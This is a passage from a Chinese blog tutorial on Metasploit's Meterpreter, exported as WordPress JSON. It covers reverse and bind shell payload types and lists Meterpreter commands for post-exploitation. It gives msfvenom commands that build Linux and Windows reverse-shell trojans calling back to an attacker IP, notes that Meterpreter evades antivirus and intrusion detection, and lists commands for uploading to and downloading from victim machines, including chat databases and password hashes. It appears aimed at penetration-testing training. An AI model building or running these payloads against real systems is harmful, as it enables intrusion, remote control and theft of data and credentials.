{"id":305,"date":"2022-06-12T15:05:01","date_gmt":"2022-06-12T07:05:01","guid":{"rendered":"https:\/\/sportrehabilitation.cn\/?p=305"},"modified":"2022-06-12T15:05:05","modified_gmt":"2022-06-12T07:05:05","slug":"meterpreter%e5%91%bd%e4%bb%a4%e8%af%a6%e8%a7%a3","status":"publish","type":"post","link":"https:\/\/sportai.asia\/index.php\/2022\/06\/12\/meterpreter%e5%91%bd%e4%bb%a4%e8%af%a6%e8%a7%a3\/","title":{"rendered":"<a href=\"https:\/\/www.cnblogs.com\/backlion\/p\/9484949.html\">Meterpreter\u547d\u4ee4\u8be6\u89e3<\/a>"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">0x01\u521d\u8bc6Meterpreter<\/h2>\n\n\n\n<p>1.1.\u4ec0\u4e48\u662fMeterpreter<\/p>\n\n\n\n<p>&nbsp; Meterpreter\u662fMetasploit\u6846\u67b6\u4e2d\u7684\u4e00\u4e2a\u6269\u5c55\u6a21\u5757\uff0c\u4f5c\u4e3a\u6ea2\u51fa\u6210\u529f\u4ee5\u540e\u7684\u653b\u51fb\u8f7d\u8377\u4f7f\u7528\uff0c\u653b\u51fb\u8f7d\u8377\u5728\u6ea2\u51fa\u653b\u51fb\u6210\u529f\u4ee5\u540e\u7ed9\u6211\u4eec\u8fd4\u56de\u4e00\u4e2a\u63a7\u5236\u901a\u9053\u3002\u4f7f\u7528\u5b83\u4f5c\u4e3a\u653b\u51fb\u8f7d\u8377\u80fd\u591f\u83b7\u5f97\u76ee\u6807\u7cfb\u7edf\u7684\u4e00\u4e2aMeterpreter shell\u7684\u94fe\u63a5\u3002Meterpreter shell\u4f5c\u4e3a\u6e17\u900f\u6a21\u5757\u6709\u5f88\u591a\u6709\u7528\u7684\u529f\u80fd\uff0c\u6bd4\u5982\u6dfb\u52a0\u4e00\u4e2a\u7528\u6237\u3001\u9690\u85cf\u4e00\u4e9b\u4e1c\u897f\u3001\u6253\u5f00shell\u3001\u5f97\u5230\u7528\u6237\u5bc6\u7801\u3001\u4e0a\u4f20\u4e0b\u8f7d\u8fdc\u7a0b\u4e3b\u673a\u7684\u6587\u4ef6\u3001\u8fd0\u884ccmd.exe\u3001\u6355\u6349\u5c4f\u5e55\u3001\u5f97\u5230\u8fdc\u7a0b\u63a7\u5236\u6743\u3001\u6355\u83b7\u6309\u952e\u4fe1\u606f\u3001\u6e05\u9664\u5e94\u7528\u7a0b\u5e8f\u3001\u663e\u793a\u8fdc\u7a0b\u4e3b\u673a\u7684\u7cfb\u7edf\u4fe1\u606f\u3001\u663e\u793a\u8fdc\u7a0b\u673a\u5668\u7684\u7f51\u7edc\u63a5\u53e3\u548cIP\u5730\u5740\u7b49\u4fe1\u606f\u3002\u53e6\u5916Meterpreter\u80fd\u591f\u8eb2\u907f\u5165\u4fb5\u68c0\u6d4b\u7cfb\u7edf\u3002\u5728\u8fdc\u7a0b\u4e3b\u673a\u4e0a\u9690\u85cf\u81ea\u5df1,\u5b83\u4e0d\u6539\u53d8\u7cfb\u7edf\u786c\u76d8\u4e2d\u7684\u6587\u4ef6,\u56e0\u6b64HIDS[\u57fa\u4e8e\u4e3b\u673a\u7684\u5165\u4fb5\u68c0\u6d4b\u7cfb\u7edf]\u5f88\u96be\u5bf9\u5b83\u505a\u51fa\u54cd\u5e94\u3002\u6b64\u5916\u5b83\u5728\u8fd0\u884c\u7684\u65f6\u5019\u7cfb\u7edf\u65f6\u95f4\u662f\u53d8\u5316\u7684,\u6240\u4ee5\u8ddf\u8e2a\u5b83\u6216\u8005\u7ec8\u6b62\u5b83\u5bf9\u4e8e\u4e00\u4e2a\u6709\u7ecf\u9a8c\u7684\u4eba\u4e5f\u4f1a\u53d8\u5f97\u975e\u5e38\u56f0\u96be\u3002<\/p>\n\n\n\n<p>&nbsp;&nbsp;\u6700\u540e,Meterpreter\u8fd8\u53ef\u4ee5\u7b80\u5316\u4efb\u52a1\u521b\u5efa\u591a\u4e2a\u4f1a\u8bdd\u3002\u53ef\u4ee5\u6765\u5229\u7528\u8fd9\u4e9b\u4f1a\u8bdd\u8fdb\u884c\u6e17\u900f\u3002\u5728Metasploit Framework\u4e2d\uff0cMeterpreter\u662f\u4e00\u79cd\u540e\u6e17\u900f\u5de5\u5177\uff0c\u5b83\u5c5e\u4e8e\u4e00\u79cd\u5728\u8fd0\u884c\u8fc7\u7a0b\u4e2d\u53ef\u901a\u8fc7\u7f51\u7edc\u8fdb\u884c\u529f\u80fd\u6269\u5c55\u7684\u52a8\u6001\u53ef\u6269\u5c55\u578bPayload\u3002\u8fd9\u79cd\u5de5\u5177\u662f\u57fa\u4e8e\u201c\u5185\u5b58DLL\u6ce8\u5165\u201d\u7406\u5ff5\u5b9e\u73b0\u7684\uff0c\u5b83\u80fd\u591f\u901a\u8fc7\u521b\u5efa\u4e00\u4e2a\u65b0\u8fdb\u7a0b\u5e76\u8c03\u7528\u6ce8\u5165\u7684DLL\u6765\u8ba9\u76ee\u6807\u7cfb\u7edf\u8fd0\u884c\u6ce8\u5165\u7684DLL\u6587\u4ef6\u3002\u5176\u4e2d\uff0c\u653b\u51fb\u8005\u4e0e\u76ee\u6807\u8bbe\u5907\u4e2dMeterpreter\u7684\u901a\u4fe1\u662f\u901a\u8fc7Stager\u5957\u63a5\u5b57\u5b9e\u73b0\u7684meterpreter\u4f5c\u4e3a\u540e\u6e17\u900f\u6a21\u5757\u6709\u591a\u79cd\u7c7b\u578b\uff0c\u5e76\u4e14\u547d\u4ee4\u7531\u6838\u5fc3\u547d\u4ee4\u548c\u6269\u5c55\u5e93\u547d\u4ee4\u7ec4\u6210\uff0c\u6781\u5927\u7684\u4e30\u5bcc\u4e86\u653b\u51fb\u65b9\u5f0f\u3002<\/p>\n\n\n\n<p>&nbsp;\u9700\u8981\u8bf4\u660e\u7684meterpreter\u5728\u6f0f\u6d1e\u5229\u7528\u6210\u529f\u540e\u4f1a\u53d1\u9001\u7b2c\u4e8c\u9636\u6bb5\u7684\u4ee3\u7801\u548cmeterpreter\u670d\u52a1\u5668dll\uff0c\u6240\u4ee5\u5728\u7f51\u7edc\u4e0d\u7a33\u5b9a\u7684\u60c5\u51b5\u4e0b\u7ecf\u5e38\u51fa\u73b0\u6ca1\u6709\u53ef\u6267\u884c\u547d\u4ee4\uff0c\u6216\u8005\u4f1a\u8bdd\u5efa\u7acb\u6267\u884chelp\u4e4b\u540e\u53d1\u73b0\u7f3a\u5c11\u547d\u4ee4\u3002 \u8fde\u4e0avpn\u53c8\u5728\u5185\u7f51\u4e2d\u4f7f\u7528psexec\u548cbind_tcp\u7684\u65f6\u5019\u7ecf\u5e38\u4f1a\u51fa\u73b0\u8fd9\u79cd\u60c5\u51b5<\/p>\n\n\n\n<p>1.2.Meterpreter\u6280\u672f\u4f18\u52bf<\/p>\n\n\n\n<p>&nbsp; Metasploit\u63d0\u4f9b\u4e86\u5404\u4e2a\u4e3b\u6d41\u5e73\u53f0\u7684Meterpreter\u7248\u672c\uff0c\u5305\u62ecWindows\u3001Linux\uff0c\u540c\u65f6\u652f\u6301x86\u3001x64\u5e73\u53f0\uff0c\u53e6\u5916\uff0cMeterpreter\u8fd8\u63d0\u4f9b\u4e86\u57fa\u4e8ePHP\u548cJava\u8bed\u8a00\u7684\u5b9e\u73b0\u3002Meterpreter\u7684\u5de5\u4f5c\u6a21\u5f0f\u662f\u7eaf\u5185\u5b58\u7684\uff0c\u597d\u5904\u662f\u542f\u52a8\u9690\u85cf\uff0c\u5f88\u96be\u88ab\u6740\u6bd2\u8f6f\u4ef6\u76d1\u6d4b\u5230\u3002\u4e0d\u9700\u8981\u8bbf\u95ee\u76ee\u6807\u4e3b\u673a\u78c1\u76d8\uff0c\u6240\u4ee5\u4e5f\u6ca1\u4ec0\u4e48\u5165\u4fb5\u7684\u75d5\u8ff9\u3002\u9664\u4e0a\u8ff0\u5916\uff0cMeterpreter\u8fd8\u652f\u6301Ruby\u811a\u672c\u5f62\u5f0f\u7684\u6269\u5c55\u3002\u6240\u4ee5Ruby\u8bed\u8a00\u8fd8\u5f88\u6709\u5fc5\u8981\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">0x02 Meterpreter\u4e2d\u5e38\u7528\u7684\u53cd\u5f39\u7c7b\u578b<\/h2>\n\n\n\n<p>1.reverse_tcp<\/p>\n\n\n\n<p>\u8fd9\u662f\u4e00\u4e2a\u57fa\u4e8eTCP\u7684\u53cd\u5411\u94fe\u63a5\u53cd\u5f39shell,&nbsp;\u4f7f\u7528\u8d77\u6765\u5f88\u7a33\u5b9a<\/p>\n\n\n\n<p>\uff081\uff09Linux\uff1a<\/p>\n\n\n\n<p>\u4f7f\u7528\u4e0b\u5217\u547d\u4ee4\u751f\u6210\u4e00\u4e2aLinux\u4e0b\u53cd\u5f39shell\u6728\u9a6c\uff1a<\/p>\n\n\n\n<p>msfvenom -p linux\/x86\/meterpreter\/reverse_tcp lhost=192.168.1.102 lport=4444&nbsp; -f elf -o shell<\/p>\n\n\n\n<p>\u770b\u4e0a\u56fe\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u89c1\u76ee\u5f55\u4e0b\u5df2\u7ecf\u6210\u529f\u751f\u6210\u6728\u9a6c\u6587\u4ef6isshell\u3002\u7136\u540e\u6211\u4eec\u7ed9\u6587\u4ef6\u52a0\u4e0a\u53ef\u6267\u884c\u6743\u9650\u3002\u7136\u540e\u6211\u4eec\u6253\u5f00Metasploit\uff0c\u4f7f\u7528\u6a21\u5757handler\uff0c\u8bbe\u7f6epayload\uff0c\u6ce8\u610f\uff1a\u8fd9\u91cc\u8bbe\u7f6e\u7684payload\u8981\u548c\u6211\u4eec\u751f\u6210\u6728\u9a6c\u6240\u4f7f\u7528\u7684payload\u4e00\u6837\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025458011-473731884.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u8bbe\u7f6e\u4e0b\u5730\u5740\u548c\u7aef\u53e3\uff0c\u6211\u4eec\u5c31\u5f00\u59cb\u76d1\u542c\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025458562-1367381786.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u8fd9\u8fb9\u8fd0\u884c\u4e00\u4e0b\u6211\u4eec\u7684\u53cd\u5f39shell\u6728\u9a6c\uff0c\u53ef\u4ee5\u53d1\u73b0\u6210\u529f\u53cd\u5f39\u56deshell\u4e86<\/p>\n\n\n\n<p>\uff082\uff09Windows\uff1a<\/p>\n\n\n\n<p>msfvenom -p windows\/meterpreter\/reverse_tcp lhost=[\u4f60\u7684IP] lport=[\u7aef\u53e3] -f exe -o&nbsp;\u8981\u751f\u6210\u7684\u6587\u4ef6\u540d<\/p>\n\n\n\n<p>msfvenom -p &nbsp;windows\/meterpreter\/reverse_tcp lhost=192.168.1.102 lport=4444&nbsp; -f exe -o &nbsp;shell.exe<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025459101-2013398451.gif\" alt=\"\u8fd9\u91cc\u5199\u56fe\u7247\u63cf\u8ff0\"\/><\/figure>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025459414-1360054945.gif\" alt=\"\u8fd9\u91cc\u5199\u56fe\u7247\u63cf\u8ff0\" width=\"554\" height=\"68\"><br>\u53cd\u5411\u8fde\u63a5shell,\u4f7f\u7528\u8d77\u6765\u5f88\u7a33\u5b9a\uff0c\u9700\u8981\u8bbe\u7f6eLHOST<\/p>\n\n\n\n<p>2.reverse_http<\/p>\n\n\n\n<p>\u57fa\u4e8ehttp\u65b9\u5f0f\u7684\u53cd\u5411\u8fde\u63a5\uff0c\u5728\u7f51\u901f\u6162\u7684\u60c5\u51b5\u4e0b\u4e0d\u7a33\u5b9a\u3002<\/p>\n\n\n\n<p>payload:\/windows\/meterpreter\/reverse_http<\/p>\n\n\n\n<p>3.reverse_https<\/p>\n\n\n\n<p>\u57fa\u4e8ehttps\u65b9\u5f0f\u7684\u53cd\u5411\u8fde\u63a5\uff0c\u5728\u7f51\u901f\u6162\u7684\u60c5\u51b5\u4e0b\u4e0d\u7a33\u5b9a\uff0c https\u5982\u679c\u53cd\u5f39\u6ca1\u6709\u6536\u5230\u6570\u636e\uff0c\u53ef\u4ee5\u5c06\u76d1\u542c\u7aef\u53e3\u6362\u6210443\u8bd5\u8bd5<\/p>\n\n\n\n<p>payload:\/windows\/meterpreter\/reverse_https<\/p>\n\n\n\n<p>4.bind_tcp<\/p>\n\n\n\n<p>\u8fd9\u662f\u4e00\u4e2a\u57fa\u4e8eTCP\u7684\u6b63\u5411\u8fde\u63a5shell\uff0c\u56e0\u4e3a\u5728\u5185\u7f51\u8de8\u7f51\u6bb5\u65f6\u65e0\u6cd5\u8fde\u63a5\u5230attack\u7684\u673a\u5668\uff0c\u6240\u4ee5\u5728\u5185\u7f51\u4e2d\u7ecf\u5e38\u4f1a\u4f7f\u7528\uff0c\u4e0d\u9700\u8981\u8bbe\u7f6eLHOST\u3002<\/p>\n\n\n\n<p>\u4f7f\u7528\u4e0b\u5217\u547d\u4ee4\u751f\u6210\u6728\u9a6c\uff1a<\/p>\n\n\n\n<p>msfvenom -p linux\/x86\/meterpreter\/bind_tcp lport=4444&nbsp; -f elf -o shell<\/p>\n\n\n\n<p>\u540c\u6837\u9053\u7406\u52a0\u6743\u9650\u8fd0\u884c\uff0c\u4e0d\u6f14\u793a\u4e86\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025459988-65954721.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u6ce8\u610f\uff0c\u6211\u4eec\u8bbe\u7f6e\u7684IP\u5730\u5740\u548c\u7aef\u53e3\u5c31\u662f\u76ee\u6807\u673a\u7684\u3002\u56e0\u4e3a\u8fd9\u662f\u6211\u4eec\u4e3b\u52a8\u6765\u8fde\u63a5\u5b83\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">0x03 \u76f8\u5173Payload<\/h2>\n\n\n\n<p>Payload\u4e2d\u5305\u542b\u6709\u9700\u8981\u5728\u8fdc\u7a0b\u7cfb\u7edf\u4e2d\u8fd0\u884c\u7684\u6076\u610f\u4ee3\u7801\uff0c\u800c\u5728Metasploit\u4e2dPayload\u662f\u4e00\u79cd\u7279\u6b8a\u6a21\u5757\uff0c\u5b83\u4eec\u80fd\u591f\u4ee5\u6f0f\u6d1e\u5229\u7528\u6a21\u5757\u8fd0\u884c\uff0c\u5e76\u80fd\u591f\u5229\u7528\u76ee\u6807\u7cfb\u7edf\u4e2d\u7684\u5b89\u5168\u6f0f\u6d1e\u5b9e\u65bd\u653b\u51fb\u3002\u7b80\u800c\u8a00\u4e4b\uff0c\u8fd9\u79cd\u6f0f\u6d1e\u5229\u7528\u6a21\u5757\u53ef\u4ee5\u8bbf\u95ee\u76ee\u6807\u7cfb\u7edf\uff0c\u800c\u5176\u4e2d\u7684\u4ee3\u7801\u5b9a\u4e49\u4e86Payload\u5728\u76ee\u6807\u7cfb\u7edf\u4e2d\u7684\u884c\u4e3a\u3002<\/p>\n\n\n\n<p>Metasploit\u4e2d\u7684Payload\u6a21\u5757\u4e3b\u8981\u6709\u4ee5\u4e0b\u4e09\u79cd\u7c7b\u578b\uff1a<\/p>\n\n\n\n<p>-Single<\/p>\n\n\n\n<p>-Stager<\/p>\n\n\n\n<p>-Stage<\/p>\n\n\n\n<p>Single\u662f\u4e00\u79cd\u5b8c\u5168\u72ec\u7acb\u7684Payload\uff0c\u800c\u4e14\u4f7f\u7528\u8d77\u6765\u5c31\u50cf\u8fd0\u884ccalc.exe\u4e00\u6837\u7b80\u5355\uff0c\u4f8b\u5982\u6dfb\u52a0\u4e00\u4e2a\u7cfb\u7edf\u7528\u6237\u6216\u5220\u9664\u4e00\u4efd\u6587\u4ef6\u3002\u7531\u4e8eSingle Payload\u662f\u5b8c\u5168\u72ec\u7acb\u7684\uff0c\u56e0\u6b64\u5b83\u4eec\u6709\u53ef\u80fd\u4f1a\u88ab\u7c7b\u4f3c<a href=\"https:\/\/en.wikipedia.org\/wiki\/Netcat\">netcat<\/a>\u8fd9\u6837\u7684\u975emetasploit\u5904\u7406\u5de5\u5177\u6240\u6355\u6349\u5230\u3002<\/p>\n\n\n\n<p>Stager\u8fd9\u79cdPayload\u8d1f\u8d23\u5efa\u7acb\u76ee\u6807\u7528\u6237\u4e0e\u653b\u51fb\u8005\u4e4b\u95f4\u7684\u7f51\u7edc\u8fde\u63a5\uff0c\u5e76\u4e0b\u8f7d\u989d\u5916\u7684\u7ec4\u4ef6\u6216\u5e94\u7528\u7a0b\u5e8f\u3002\u4e00\u79cd\u5e38\u89c1\u7684Stagers Payload\u5c31\u662freverse_tcp\uff0c\u5b83\u53ef\u4ee5\u8ba9\u76ee\u6807\u7cfb\u7edf\u4e0e\u653b\u51fb\u8005\u5efa\u7acb\u4e00\u6761tcp\u8fde\u63a5\u3002\u53e6\u4e00\u79cd\u5e38\u89c1\u7684\u662fbind_tcp\uff0c\u5b83\u53ef\u4ee5\u8ba9\u76ee\u6807\u7cfb\u7edf\u5f00\u542f\u4e00\u4e2atcp\u76d1\u542c\u5668\uff0c\u800c\u653b\u51fb\u8005\u968f\u65f6\u53ef\u4ee5\u4e0e\u76ee\u6807\u7cfb\u7edf\u8fdb\u884c\u901a\u4fe1\u3002<\/p>\n\n\n\n<p>Stage\u662fStager Payload\u4e0b\u8f7d\u7684\u4e00\u79cdPayload\u7ec4\u4ef6\uff0c\u8fd9\u79cdPayload\u53ef\u4ee5\u63d0\u4f9b\u66f4\u52a0\u9ad8\u7ea7\u7684\u529f\u80fd\uff0c\u800c\u4e14\u6ca1\u6709\u5927\u5c0f\u9650\u5236\u3002<\/p>\n\n\n\n<p>\u5728Metasploit\u4e2d\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7Payload\u7684\u540d\u79f0\u548c\u4f7f\u7528\u683c\u5f0f\u6765\u63a8\u65ad\u5b83\u7684\u7c7b\u578b\uff1a<\/p>\n\n\n\n<p>Single Payload\u7684\u683c\u5f0f\u4e3a&lt;target&gt;\/&nbsp;&lt;single&gt;<\/p>\n\n\n\n<p>Stager\/Stage Payload\u7684\u683c\u5f0f\u4e3a&lt;target&gt;\/&nbsp;&lt;stage&gt;&nbsp;\/&nbsp;&lt;stager&gt;<\/p>\n\n\n\n<p>\u5f53\u6211\u4eec\u5728Metasploit\u4e2d\u6267\u884c\u201cshow payloads\u201d\u547d\u4ee4\u4e4b\u540e\uff0c\u5b83\u4f1a\u7ed9\u6211\u4eec\u663e\u793a\u4e00\u4e2a\u53ef\u4f7f\u7528\u7684Payload\u5217\u8868\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/image.3001.net\/images\/20171121\/15112655193820.png\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025501025-1553854514.gif\" alt=\"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/><\/a><\/figure>\n\n\n\n<p>\u5728\u8fd9\u4e2a\u5217\u8868\u4e2d\uff0cwindows\/powershell_bind_tcp\u5c31\u662f\u4e00\u4e2aSingle Payload\uff0c\u5b83\u4e0d\u5305\u542bStage Payload\u3002\u800cwindows\/x64\/meterpreter\/reverse_tcp\u5219\u7531\u4e00\u4e2aStager Payload\uff08reverse_tcp\uff09\u548c\u4e00\u4e2aStage Payload\uff08meterpreter\uff09\u7ec4\u6210\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">0x04 Meterpreter\u7684\u5e38\u7528\u547d\u4ee4<\/h2>\n\n\n\n<p>1.\u57fa\u672c\u547d\u4ee4<\/p>\n\n\n\n<p>help# \u67e5\u770bMeterpreter\u5e2e\u52a9<\/p>\n\n\n\n<p>background#\u8fd4\u56de\uff0c\u628ameterpreter\u540e\u53f0\u6302\u8d77<\/p>\n\n\n\n<p>bgkill# \u6740\u6b7b\u4e00\u4e2a\u80cc\u666f meterpreter \u811a\u672c<\/p>\n\n\n\n<p>bglist#\u63d0\u4f9b\u6240\u6709\u6b63\u5728\u8fd0\u884c\u7684\u540e\u53f0\u811a\u672c\u7684\u5217\u8868<\/p>\n\n\n\n<p>bgrun#\u4f5c\u4e3a\u4e00\u4e2a\u540e\u53f0\u7ebf\u7a0b\u8fd0\u884c\u811a\u672c<\/p>\n\n\n\n<p>channel#\u663e\u793a\u6d3b\u52a8\u9891\u9053<\/p>\n\n\n\n<p>sessions -i number # \u4e0e\u4f1a\u8bdd\u8fdb\u884c\u4ea4\u4e92\uff0cnumber\u8868\u793a\u7b2cn\u4e2asession,\u4f7f\u7528session -i&nbsp;\u8fde\u63a5\u5230\u6307\u5b9a\u5e8f\u53f7\u7684meterpreter\u4f1a\u8bdd\u5df2\u7ee7\u7eed\u5229\u7528<\/p>\n\n\n\n<p>sesssions -k&nbsp; number #\u4e0e\u4f1a\u8bdd\u8fdb\u884c\u4ea4\u4e92<\/p>\n\n\n\n<p>close# \u5173\u95ed\u901a\u9053<\/p>\n\n\n\n<p>exit# \u7ec8\u6b62 meterpreter \u4f1a\u8bdd<\/p>\n\n\n\n<p>quit# \u7ec8\u6b62 meterpreter \u4f1a\u8bdd<\/p>\n\n\n\n<p>interact id #\u5207\u6362\u8fdb\u4e00\u4e2a\u4fe1\u9053<\/p>\n\n\n\n<p>run#\u6267\u884c\u4e00\u4e2a\u5df2\u6709\u7684\u6a21\u5757\uff0c\u8fd9\u91cc\u8981\u8bf4\u7684\u662f\u8f93\u5165run\u540e\u6309\u4e24\u4e0btab\uff0c\u4f1a\u5217\u51fa\u6240\u6709\u7684\u5df2\u6709\u7684\u811a\u672c\uff0c\u5e38\u7528\u7684\u6709autoroute,hashdump,arp_scanner,multi_meter_inject\u7b49<\/p>\n\n\n\n<p>irb# \u8fdb\u5165 Ruby \u811a\u672c\u6a21\u5f0f<\/p>\n\n\n\n<p>read# \u4ece\u901a\u9053\u8bfb\u53d6\u6570\u636e<\/p>\n\n\n\n<p>write# \u5c06\u6570\u636e\u5199\u5165\u5230\u4e00\u4e2a\u901a\u9053<\/p>\n\n\n\n<p>run\u548cbgrun# \u524d\u53f0\u548c\u540e\u53f0\u6267\u884c\u4ee5\u540e\u5b83\u9009\u5b9a\u7684&nbsp;meterpreter&nbsp;\u811a\u672c<\/p>\n\n\n\n<p>use# \u52a0\u8f7d meterpreter \u7684\u6269\u5c55<\/p>\n\n\n\n<p>load\/use#\u52a0\u8f7d\u6a21\u5757<\/p>\n\n\n\n<p>Resource#\u6267\u884c\u4e00\u4e2a\u5df2\u6709\u7684rc\u811a\u672c<\/p>\n\n\n\n<p>2.\u6587\u4ef6\u7cfb\u7edf\u547d\u4ee4<\/p>\n\n\n\n<p>cat c:\\boot.ini#\u67e5\u770b\u6587\u4ef6\u5185\u5bb9,\u6587\u4ef6\u5fc5\u987b\u5b58\u5728<\/p>\n\n\n\n<p>del c:\\boot.ini #\u5220\u9664\u6307\u5b9a\u7684\u6587\u4ef6<\/p>\n\n\n\n<p>upload \/root\/Desktop\/netcat.exe c:\\ # \u4e0a\u4f20\u6587\u4ef6\u5230\u76ee\u6807\u673a\u4e3b\u4e0a\uff0c\u5982upload&nbsp; setup.exe C:\\\\windows\\\\system32\\<\/p>\n\n\n\n<p>download nimeia.txt \/root\/Desktop\/&nbsp;&nbsp; # \u4e0b\u8f7d\u6587\u4ef6\u5230\u672c\u673a\u4e0a\u5982\uff1adownload C:\\\\boot.ini \/root\/\u6216\u8005download C:\\\\&#8221;ProgramFiles&#8221;\\\\Tencent\\\\QQ\\\\Users\\\\295******125\\\\Msg2.0.db \/root\/<\/p>\n\n\n\n<p>edit c:\\boot.ini&nbsp; # \u7f16\u8f91\u6587\u4ef6<\/p>\n\n\n\n<p>getlwd#\u6253\u5370\u672c\u5730\u76ee\u5f55<\/p>\n\n\n\n<p>getwd#\u6253\u5370\u5de5\u4f5c\u76ee\u5f55<\/p>\n\n\n\n<p>lcd#\u66f4\u6539\u672c\u5730\u76ee\u5f55<\/p>\n\n\n\n<p>ls#\u5217\u51fa\u5728\u5f53\u524d\u76ee\u5f55\u4e2d\u7684\u6587\u4ef6\u5217\u8868<\/p>\n\n\n\n<p>lpwd#\u6253\u5370\u672c\u5730\u76ee\u5f55<\/p>\n\n\n\n<p>pwd#\u8f93\u51fa\u5de5\u4f5c\u76ee\u5f55<\/p>\n\n\n\n<p>cd c:\\\\ #\u8fdb\u5165\u76ee\u5f55\u6587\u4ef6\u4e0b<\/p>\n\n\n\n<p>rm file #\u5220\u9664\u6587\u4ef6<\/p>\n\n\n\n<p>mkdir dier #\u5728\u53d7\u5bb3\u8005\u7cfb\u7edf\u4e0a\u7684\u521b\u5efa\u76ee\u5f55<\/p>\n\n\n\n<p>rmdir#\u53d7\u5bb3\u8005\u7cfb\u7edf\u4e0a\u5220\u9664\u76ee\u5f55<\/p>\n\n\n\n<p>dir#\u5217\u51fa\u76ee\u6807\u4e3b\u673a\u7684\u6587\u4ef6\u548c\u6587\u4ef6\u5939\u4fe1\u606f<\/p>\n\n\n\n<p>mv#\u4fee\u6539\u76ee\u6807\u4e3b\u673a\u4e0a\u7684\u6587\u4ef6\u540d<\/p>\n\n\n\n<p>search -d d:\\\\www -f web.config #search \u6587\u4ef6\uff0c\u5982search&nbsp; -d c:\\\\&nbsp; -f*.doc<\/p>\n\n\n\n<p>meterpreter &gt; search -f autoexec.bat&nbsp; #\u641c\u7d22\u6587\u4ef6<\/p>\n\n\n\n<p>meterpreter &gt; search -f sea*.bat c:\\\\xamp\\\\<\/p>\n\n\n\n<p>enumdesktops&nbsp;&nbsp;&nbsp;&nbsp; #\u7528\u6237\u767b\u5f55\u6570<\/p>\n\n\n\n<p>(1)\u4e0b\u8f7d\u6587\u4ef6<\/p>\n\n\n\n<p>\u4f7f\u7528\u547d\u4ee4\u201cdownload +file path\u201d,\u5c06\u4e0b\u8f7d\u76ee\u6807\u673a\u5668\u7684\u76f8\u5bf9\u5e94\u6743\u9650\u7684\u4efb\u4f55\u8def\u5f84\u4e0b\u7684\u6587\u4ef6<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/205521203.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025501575-714101040.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>(2)\u4e0a\u4f20\u6587\u4ef6<\/p>\n\n\n\n<p>\u201cupload\u201d\u547d\u4ee4\u4e3a\u4e0a\u4f20\u6587\u4ef6\u5230\u6211\u4eec\u7684\u76ee\u6807\u673a\u5668\uff0c\u5728\u56fe\u4e2d\u6211\u4eec\u4e0a\u4f20\u4e86ll.txt\u5230\u76ee\u6807\u673a\u5668\u7684c:\\pp\\\u4e0b\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/205723892.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025501957-1931308778.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>(3)\u67e5\u770b\u6587\u4ef6<\/p>\n\n\n\n<p>\u201ccat filename\u201d\u5728\u5f53\u524d\u76ee\u5f55\u4e0b\u67e5\u770b\u6587\u4ef6\u5185\u5bb9\uff0c\u8f93\u5165\u547d\u4ee4\u540e\u4fbf\u4f1a\u8fd4\u56de\u7ed9\u6211\u4eec\u6240\u67e5\u770b\u6587\u4ef6\u7684\u5185\u5bb9\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/205738246.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025502211-607228724.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>(4)\u5207\u6362\u3001\u67e5\u8be2\u5f53\u524d\u8def\u5f84<\/p>\n\n\n\n<p>\u201cpwd\u201d\u547d\u4ee4\u5c06\u67e5\u8be2\u5f53\u524d\u5728dos\u547d\u4ee4\u4e0b\u7684\u8def\u5f84\uff0c\u201ccd\u201d\u547d\u4ee4\u53ef\u4ee5\u6539\u53d8\u5f53\u524d\u8def\u5f84\uff0c\u5982\u4e0b\u56fe\u4e2dcd ..\u4e3a\u5207\u6362\u5230\u5f53\u524d\u8def\u5f84\u4e0b\u7684\u4e0a\u4e00\u76ee\u5f55\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/205753548.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025502526-1553731175.gif\" 